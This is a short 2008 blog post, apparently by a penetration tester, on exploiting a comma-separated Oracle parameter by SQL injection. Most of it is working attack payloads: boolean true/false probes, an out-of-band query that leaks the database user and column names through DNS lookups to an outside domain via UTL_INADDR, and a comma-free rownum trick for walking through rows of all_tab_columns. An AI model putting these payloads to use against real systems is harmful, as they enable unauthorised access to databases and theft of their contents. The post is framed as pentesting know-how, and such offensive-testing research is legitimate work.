Getting Past the Comma(,) in Oracle SQL Injection

May 24, 2008

Recently i came across a SQL Injection against oracle database, where the vulnerable parameter was taking comma separated input.

Thus Valid input will look like:- index.do?id=1,200

And it was easier to confirm that its vulnerable to sql injection by making true and false responses:-

True response:- index.do?id=1,200 and 1=1

False Response:- index.do?id=1,200 and 1=2

This way i could carry out the bind sql injection, but then i tried to get data through out of band channeling  and that worked too:-

example:-index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null

However, the problem arrived when i had to get data by iterating through rows. In order, to iterate through rows i use the following syntax:-

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;

But As this application was taking comma separated values, this comma resulted in my query being structured in some other way and the application returned error.

A solution to this is to use the query like:-

index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+column_name+from+all_tab_columns+where+rownum<2+and+

column_name+not+in

(select+column_name+from+all_tab_columns where+rownum<4 ))||

'.a.notsosecure.com')+FROM+dual)+is+not+null

By increasing the rownum number (in bold) iteration could be achieved. However, as this number increases the backend queries become more and more cpu intensive. I still could not do union select query as the original query select more than one column and i could not figure out a way to do union select without entering comma.

—-
A good resource for pentesting oracle Application server can be found here:-

Oracle Application Scanner(OAPscan) is also a very handy tool. 

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback